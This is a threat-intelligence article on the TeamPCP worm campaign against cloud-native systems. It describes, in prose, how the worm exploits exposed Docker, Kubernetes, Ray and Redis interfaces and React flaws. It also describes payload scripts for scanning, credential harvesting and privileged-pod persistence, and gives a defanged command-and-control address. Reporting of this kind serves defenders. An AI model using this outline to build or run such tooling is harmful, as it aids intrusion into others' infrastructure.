TeamPCP Worm

Cybersecurity researchers have uncovered a sweeping, worm-driven campaign that systematically targets cloud-native environments to construct malicious infrastructure for subsequent exploitation. Activity tied to this operation was observed around December 25, 2025, revealing a coordinated effort to abuse exposed services and vulnerabilities across modern cloud stacks.

TeamPCP: A Rapidly Emerging Threat Cluster

The campaign has been attributed to a threat cluster tracked as TeamPCP, also known by aliases including DeadCatx3, PCPcat, PersyPCP, and ShellForce. Evidence suggests the group has been operational since at least November 2025, with related Telegram activity dating back to July 30, 2025. The TeamPCP Telegram channel, which has grown to more than 700 members, is used to publish stolen data linked to victims in Canada, Serbia, South Korea, the United Arab Emirates, and the United States.

Researchers first documented the actor’s operations in December 2025 under the designation Operation PCPcat.

Opportunistic Abuse of Cloud-Native Weaknesses

TeamPCP operates as a cloud-native cybercrime platform, capitalizing on exposed management interfaces, common misconfigurations, and critical vulnerabilities, including the recently disclosed React2Shell flaw (CVE-2025-55182, CVSS 10.0). The primary infection pathways observed in the campaign include:

Exposed Docker APIs, Kubernetes APIs, Ray dashboards, Redis servers, and vulnerable React/Next.js applications

These weaknesses are exploited not to target specific industries, but to opportunistically seize infrastructure, most frequently within Amazon Web Services and Microsoft Azure environments, turning affected organizations into collateral victims.

Industrialized Exploitation at Scale

Rather than relying on novel techniques, TeamPCP emphasizes scale and automation. The operation combines established tools, known vulnerabilities, and widely documented misconfigurations to industrialize exploitation. Compromised environments are transformed into a self-propagating criminal ecosystem that supports scanning, lateral movement, persistence, and monetization.

The overarching objectives include building distributed proxy and scanning infrastructure, exfiltrating data, deploying ransomware, conducting extortion campaigns, and mining cryptocurrency. Compromised assets are also repurposed for data hosting, proxy services, and command-and-control relays.

Modular Payloads and Cloud-Aware Tooling

Successful initial access enables the delivery of secondary payloads from external servers, typically in shell or Python form, designed to expand the campaign’s reach. A central component, proxy.sh, installs proxy, peer-to-peer, and tunneling utilities while deploying scanners that continuously probe the internet for new vulnerable targets.

Notably, proxy.sh performs runtime environment fingerprinting to determine whether it is executing inside a Kubernetes cluster. When such an environment is detected, the script follows a separate execution path and deploys cluster-specific payloads, underscoring the group’s tailored approach to cloud-native targets.

A subset of the supporting payloads includes:

• scanner.py, which downloads CIDR ranges from a GitHub account associated with DeadCatx3 to locate misconfigured Docker APIs and Ray dashboards, with optional cryptocurrency mining via mine.sh
• kube.py, which focuses on Kubernetes credential harvesting, API-based discovery of pods and namespaces, propagation through accessible pods, and persistence via privileged pods mounted on each node
• react.py, which exploits a React vulnerability (CVE-2025-29927) to achieve remote command execution at scale
• pcpcat.py, which scans large IP ranges for exposed Docker APIs and Ray dashboards and deploys malicious containers or jobs running Base64-encoded payloads

Command-and-Control and Post-Exploitation Capabilities

Researchers have linked a command-and-control node at 67.217.57[.]240 to the operation, noting overlaps with the use of Sliver, a legitimate open-source C2 framework frequently abused by threat actors during post-exploitation phases.

A Hybrid Monetization Model Built for Resilience

The PCPcat campaign demonstrates a complete attack lifecycle, scanning, exploitation, persistence, tunneling, data theft, and monetization, engineered specifically for cloud infrastructure. The primary danger posed by TeamPCP lies not in technical innovation, but in operational integration and scale. Most exploits and malware leverage well-known vulnerabilities and lightly modified open-source tooling.

At the same time, the group blends infrastructure abuse with data theft and extortion. Leaked CV databases, identity records, and corporate data are published through ShellForce to fuel ransomware operations, fraud, and reputation-building within the cybercrime ecosystem. This dual monetization strategy, profiting from both compute resources and stolen information, provides multiple revenue streams and increases resilience against disruption and takedowns.